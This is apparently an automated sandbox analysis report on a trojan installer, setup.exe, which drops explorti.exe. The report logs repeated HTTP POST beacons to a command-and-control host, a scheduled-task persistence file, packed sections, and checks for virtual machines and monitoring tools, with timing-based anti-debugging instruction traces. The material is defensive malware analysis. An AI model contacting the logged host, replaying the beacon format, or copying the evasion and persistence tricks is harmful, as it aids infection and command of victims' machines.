Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: Joe Sandbox View IP Address: 185.215.113.19 185.215.113.19
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F5BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_00F5BD60
Source: unknown HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/=
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000006.00000002.2883573047.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php

System Summary

Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F54CF0 6_2_00F54CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F93068 6_2_00F93068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F5E440 6_2_00F5E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F87D83 6_2_00F87D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F54AF0 6_2_00F54AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F9765B 6_2_00F9765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F92BD0 6_2_00F92BD0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F9777B 6_2_00F9777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F98720 6_2_00F98720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F96F09 6_2_00F96F09
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe 589EB31A43D44FE275C70BFC3F592965B9236B59645A7ED633BBEC66526D64AB
Source: setup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: setup.exe Static PE information: Section: ZLIB complexity 0.9998612534153005
Source: setup.exe Static PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
Source: explorti.exe.0.dr Static PE information: Section: ZLIB complexity 0.9998612534153005
Source: explorti.exe.0.dr Static PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: setup.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\user\Desktop\setup.exe
Source: unknown Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\setup.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: acgenral.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: samcli.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: setup.exe Static file information: File size 1909760 > 1048576
Source: setup.exe Static PE information: Raw size of usoriijt is bigger than: 0x100000 < 0x1a0c00

Data Obfuscation

Source: C:\Users\user\Desktop\setup.exe Unpacked PE file: 0.2.setup.exe.3c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 1.2.explorti.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 2.2.explorti.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 6.2.explorti.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: explorti.exe.0.dr Static PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
Source: setup.exe Static PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: usoriijt
Source: setup.exe Static PE information: section name: ymfuwjgb
Source: setup.exe Static PE information: section name: .taggant
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: usoriijt
Source: explorti.exe.0.dr Static PE information: section name: ymfuwjgb
Source: explorti.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F6D84C push ecx; ret 6_2_00F6D85F
Source: setup.exe Static PE information: section name: entropy: 7.983026486073879
Source: setup.exe Static PE information: section name: usoriijt entropy: 7.952894618410208
Source: explorti.exe.0.dr Static PE information: section name: entropy: 7.983026486073879
Source: explorti.exe.0.dr Static PE information: section name: usoriijt entropy: 7.952894618410208
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Boot Survival

Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\setup.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D6003 second address: 5D6062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FC169461AAEh 0x00000011 jmp 00007FC169461AA2h 0x00000016 jnl 00007FC169461A96h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC169461AA2h 0x00000023 jmp 00007FC169461AA3h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D6062 second address: 5D6068 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D62CB second address: 5D62D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D62D1 second address: 5D62F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007FC16945A285h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D88E7 second address: 5D88EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D88EB second address: 5D88F5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D88F5 second address: 5D88FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC169461A96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D88FF second address: 5D891C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC16945A27Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D8A10 second address: 5D8A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC169461A96h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D8A24 second address: 5D8A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D8A28 second address: 5D8A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E1890 second address: 5E18A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FC16945A27Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E0CC1 second address: 5E0CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FC169461AA1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E0CDB second address: 5E0CE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E0FD0 second address: 5E0FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC169461AA2h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461A9Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E0FF7 second address: 5E1030 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FC16945A282h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FC16945A276h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jmp 00007FC16945A27Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jnl 00007FC16945A276h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E1466 second address: 5E146A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E146A second address: 5E1470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E1747 second address: 5E174E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E174E second address: 5E1757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E2CAC second address: 5E2CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E2CB0 second address: 5E2CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E2D56 second address: 5E2D60 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E2E81 second address: 5E2E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E4061 second address: 5E40C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FC169461AA9h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+122D28D9h], esi 0x00000016 push 00000000h 0x00000018 mov esi, dword ptr [ebp+122D2A17h] 0x0000001e mov di, 03C0h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007FC169461A98h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000016h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e xor si, CC13h 0x00000043 mov dword ptr [ebp+122D18A7h], esi 0x00000049 push eax 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push edx 0x0000004e pop edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E52DA second address: 5E52DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E52DE second address: 5E52E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E5DA7 second address: 5E5DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E6877 second address: 5E6883 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E6883 second address: 5E688A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E7485 second address: 5E748B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E748B second address: 5E748F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
